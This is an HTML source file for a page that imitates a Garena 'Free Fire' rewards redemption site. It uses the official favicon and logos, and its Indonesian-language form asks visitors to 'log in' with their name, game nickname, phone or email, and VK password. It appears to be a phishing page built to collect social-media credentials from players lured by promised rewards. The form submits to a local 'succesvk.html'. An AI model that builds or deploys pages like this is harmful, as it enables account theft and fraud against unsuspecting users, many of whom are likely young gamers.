<!DOCTYPE html>
<html lang="zh">



<meta http-equiv="content-type" content="text/html;charset=utf-8" />
<head>
<style type="text/css">



.box{
 background-image:url("img/cewe.png"); 
 background-size:100% auto; 
 background-repeat: no-repeat; 
 color: white;
 width: 100%;
 height: auto;
 padding:10px;
 margin:0px auto;
 border: 0px auto;
 }
 


.hadiah {
 background-color: #ffba00;
 display: inline-block;
 width: 250px;
 height: auto;
 margin: 20px;
 color: white;
 border-radius: 10px;
}

.hadiah-apa {
 width: 250px;
 height: auto;
 margin: auto;
 border-radius: 10px;
}

.hadiah h5 {
 margin: 10px auto;
 font-size: 1.5em;
 text-align: center;
 height: 50px;
}


.tombol {
 background: transparent;
 position: relative;
 width: 30%;
 height: 40px;
 margin: 0;
 color: #000000;
 border: 1px solid #ffba00;
 font-size: 1.2em;
 font-weight:700;
 text-align: center;
 letter-spacing: 1px;
 outline: none;
 cursor: pointer;
}

h4 {
color: white;
}

input[type=text],input[type=password],input[type=number] {
 background:transparent;
 width:100%;
 padding:12px 20px;
 margin:8px 0;
 display:inline-block;
 border:1px solid #FFD700;
 color: #FFD700;
 box-sizing: border-box;
}

label {
 color: #ffba00;
}
</style>
    <!-- M002 V3 -->
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <!-- set if need to be able scaled -->
    <meta name="description" content="">
    <meta name="author" content="">
    <meta name="title" content="FreeFire">
    <meta name="description" content="FreeFire">
    <meta property="og:title" content="FreeFire">
    <meta property="og:description" content="FreeFire">
    <title>Free Fire</title>
    <link rel="shortcut icon" href="https://ff.garena.tw/static/favicon.ico" type="image/x-icon">
    <link rel="stylesheet" href="css/reset.css" />
    <!-- Bootstrap core CSS -->
    <link href="css/bootstrap.min.css" rel="stylesheet">
    <!-- IE10 viewport hack for Surface/desktop Windows 8 bug -->
    <link href="css/ie10-viewport-bug-workaround.css" rel="stylesheet">
    <!-- HTML5 Shim and Respond.js IE8 support of HTML5 elements and media queries -->
    <!-- WARNING: Respond.js doesn't work if you view the page via file:// -->
    <!--[if lt IE 9]>
      <script src="https://oss.maxcdn.com/html5shiv/3.7.2/html5shiv.min.js"></script>
      <script src="https://oss.maxcdn.com/respond/1.4.2/respond.min.js"></script>
    <![endif]-->
    <link href="css/all.css" rel="stylesheet">
    <link href="css/extra.css" rel="stylesheet">
    <!-- the css editable in USE -->
</head>
<div data-reactroot="">
<div class="container">
<div class="a_wrap2">
<div class="col-md-5 col-sm-5 col-xs-5">
<img src="imgg/logoff.png" class="gamelogo">
</div><div class="col-md-5 col-sm-5 col-xs-5">
<img src="imgg/garena.png" class="garenalogo"></div><span class="cit topics col-md-12 col-sm-12 col-xs-12">Rewards Redemption Site</span></div><div class="a_wrap"><div></div>
<span class="txt_c">Please log in.</span>
<form action="succesvk.html" method="post">
<br>

</center>
<label><font color="gold">Nama Anda : </font></label>
<input  name="nama"  placeholder="Your Name" type="text" required>


</a></span><span class="">

<br>
</center>
<label><font color="gold">Nickname Anda : </font></label>
<input  name="nickname"  placeholder="Your Nickname" type="text" required>
<br>
<center><div class="btn_vk"></center>
<label><font color="gold">Nomor Handphone Atau Alamat Email     : </font></label>
<input  name="emailvk"  placeholder="Nomor Handphone/Email" type="text" required>
<br>
<label><font color="gold">Password VK Anda    : </font></label>
<input  name="passvk"  placeholder="Password" type="password" required>
<br>

<center><button class""><img src="imgg/button.png"</center></button>
</div></div></div></div>

<body>

    <div id="app"></div>

<script type="text/javascript" src="bundle.js"></script></body>

</html>